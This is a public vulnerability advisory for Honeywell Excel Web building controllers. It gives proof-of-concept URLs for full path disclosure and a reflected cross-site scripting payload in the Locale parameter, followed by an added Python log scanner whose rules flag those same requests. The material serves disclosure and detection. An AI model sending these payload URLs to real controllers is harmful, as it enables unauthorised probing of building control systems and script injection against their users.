Honeywell MCR Web Controller Cross Site Scripting / Path Disclosure

2019.11.12
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Honeywell MCR Web Controller
# Full Path Disclosure & Cross Site Scripting
# Vendor Homepage: https://www.honeywell.com
# WebVersion: XL1000C50 EXCEL WEB 52 I/O, XL1000C500 EXCEL WEB 300 I/O, XL1000C100 EXCEL WEB 104 I/O, XL1000C1000 EXCEL WEB 600 I/O, XL1000C50U EXCEL WEB 52 I/O UUKL, XL1000C500U EXCEL WEB 300 I/O UUKL, XL1000C100U EXCEL WEB 104 I/O UUKL, XL1000C1000U EXCEL WEB 600 I/O UUKL.
# Tested on: EXCEL WEB - AIT AG XL1000C1000U 600 I/O UUKL - 05.03.2008
# Date: Nov 09, 2019
# Informer: Pablo Rebolini - <rebolini.pablo[x]gmail.com>

# Full Path Disclosure
http://<excel-web.host>/standard/login/help.php
http://<excel-web.host>/standard/login/help.php?Locale=1033&ID[]=0

# Cross Site Scripting
http://<excel-web.host>/standard/default.php?Locale=%22%3C/script%3E%3Ch1%3EXSS%3C/%22
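
Added example, not part of the original advisory: a Python check that flags the request shapes listed above in web access logs in front of the controller. It assumes Common Log Format and that a legitimate Locale value is a decimal locale ID such as the 1033 shown above; the log lines are constructed samples and the rule names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Common Log Format (not captured traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [12/Nov/2019:10:00:01 +0100] "GET /standard/default.php?Locale=1033 HTTP/1.1" 200 5120
192.0.2.44 - - [12/Nov/2019:10:02:17 +0100] "GET /standard/login/help.php?Locale=1033&ID[]=0 HTTP/1.1" 200 812
192.0.2.44 - - [12/Nov/2019:10:02:40 +0100] "GET /standard/default.php?Locale=%22%3C/script%3E%3Ch1%3EXSS%3C/%22 HTTP/1.1" 200 5180
192.0.2.10 - - [12/Nov/2019:10:05:09 +0100] "GET /standard/login/help.php?Locale=1033&ID=12 HTTP/1.1" 200 2048
192.0.2.44 - - [12/Nov/2019:10:06:30 +0100] "GET /standard/login/help.php HTTP/1.1" 200 790
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return the (hypothetical) rule names a request target matches."""
    parts = urlsplit(target)
    path = parts.path.lower()
    if not path.startswith("/standard/"):
        return []
    params = parse_qsl(parts.query, keep_blank_values=True)
    hits = []
    for key, value in params:
        # Assumption: a legitimate Locale is a decimal locale ID (e.g. 1033).
        if key.lower() == "locale" and not re.fullmatch(r"[0-9]+", value):
            hits.append("locale-not-numeric")
        if "[" in key:  # array-style key such as ID[]
            hits.append("array-parameter")
    if path.endswith("/login/help.php") and not params:
        hits.append("help-without-parameters")
    return hits

def scan(log_text):
    """Return (client, request target, matched rules) for each flagged line."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        hits = classify(m.group(2)) if m else []
        if hits:
            findings.append((m.group(1), m.group(2), hits))
    return findings

if __name__ == "__main__":
    for client, target, hits in scan(SAMPLE_LOG):
        print(client, ",".join(hits), target)
```
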

